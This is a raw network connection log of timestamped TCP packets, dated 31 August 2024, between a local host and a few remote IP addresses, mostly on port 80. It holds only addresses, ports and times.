Aug 31, 2024 15:44:18.329938889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329947948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329958916 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329972029 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.329982996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.329986095 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.329998016 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330009937 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330018997 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330039024 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.330075026 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.330075026 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.330075979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330087900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330097914 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330106020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330125093 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.330148935 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.330207109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330245018 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.330248117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330260992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330274105 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330284119 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330307961 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.330323935 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.330341101 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330351114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330362082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330368042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330378056 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.330400944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330401897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.330411911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330425024 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.330445051 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.330456972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330466986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330476999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330486059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330496073 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.330506086 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.330518007 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.330543995 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.331250906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.331296921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.331302881 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.331332922 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.331342936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.331360102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.331371069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.331381083 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.331392050 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.331401110 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.331412077 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.331444979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.331476927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.331486940 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.331496000 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.331522942 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.331546068 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.331556082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.331577063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.331588030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.331597090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.331607103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.331620932 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.331629992 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.331643105 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.332550049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.332561016 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.332570076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.332597017 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.332617044 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.332619905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.332633018 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.332642078 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.332653046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.332659006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.332669020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.332693100 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.332711935 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.332743883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.332753897 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.332758904 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.332767963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.332778931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.332791090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.332793951 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.332797050 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.332818031 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.332840919 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.333451986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.333462954 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.333468914 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.333499908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.333519936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.333530903 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.333534002 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.333551884 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.333560944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.333561897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.333570957 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.333570957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.333595037 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.333607912 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.334367037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.334378004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.334393978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.334403992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.334413052 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.334417105 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.334433079 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.334433079 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.334446907 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.334455967 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.334464073 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.334466934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.334475040 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.334477901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.334497929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.334501028 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.334508896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.334527016 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.334536076 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.334544897 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.334553957 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.334556103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.334566116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.334584951 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.334593058 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.335429907 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.335441113 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.335450888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.335462093 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.335480928 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.335505009 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.335566998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.335577011 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.335597038 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.335606098 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.335613966 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.335622072 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.335623980 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.335629940 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.335634947 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.335647106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.335655928 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.335661888 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.335669041 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.335678101 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.335679054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.335690022 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.335710049 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.335710049 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.335743904 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.341097116 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:18.384673119 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.387926102 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:18.389697075 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.419367075 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:18.420061111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.420080900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.420092106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.420100927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.420110941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.420120955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.420129061 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.420130968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.420175076 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.420762062 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.420816898 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.420851946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.420864105 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.420874119 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.420878887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.420883894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.420892954 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.420897007 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.420921087 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.420941114 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421109915 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421120882 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421129942 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421138048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421147108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421149969 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421156883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421176910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421180964 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421189070 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421200037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421205044 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421211004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421217918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421221972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421231985 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421241999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421242952 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421255112 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421258926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421273947 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421283007 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421292067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421298027 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421303034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421313047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421324968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421329975 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421335936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421339035 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421348095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421363115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421371937 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421375990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421379089 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421386003 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421411037 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421433926 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421545982 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421555996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421571970 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421581984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421592951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421601057 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421608925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421619892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421623945 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421632051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421636105 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421658039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421658993 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421684980 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421701908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421711922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421722889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421731949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421741009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.421762943 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.421786070 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.422065973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.422076941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.422086954 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.422120094 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.422147036 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.422211885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.422221899 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.422230959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.422240973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.422250032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.422280073 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.422298908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.422349930 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.422386885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.422435999 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.422522068 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.422532082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.422543049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.422559977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.422569990 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.422573090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.422584057 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.422599077 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.422621012 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.423393965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.423404932 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.423414946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.423438072 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.423465014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.423489094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.423500061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.423508883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.423520088 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.423527956 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.423554897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.423587084 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.423597097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.423607111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.423615932 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.423645973 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.423659086 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.423681974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.423693895 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.423703909 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.423711061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.423722982 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.423734903 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.423763990 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.424196959 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:18.424407005 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.424417019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.424427986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.424455881 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.424463987 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.424468040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.424478054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.424493074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.424504042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.424518108 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.424530029 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.424556017 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.425623894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.425633907 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.425645113 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.425653934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.425662994 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.425672054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.425679922 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.425681114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.425714970 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.425755978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.425765991 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.425775051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.425782919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.425792933 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.425797939 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.425805092 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.425815105 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.425822973 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.425844908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.425856113 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.426417112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.426426888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.426435947 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.426475048 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.426479101 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.426486969 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.426490068 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.426501036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.426511049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.426517010 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.426534891 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.426542997 CEST	49727	80	192.168.2.5	52.212.52.84
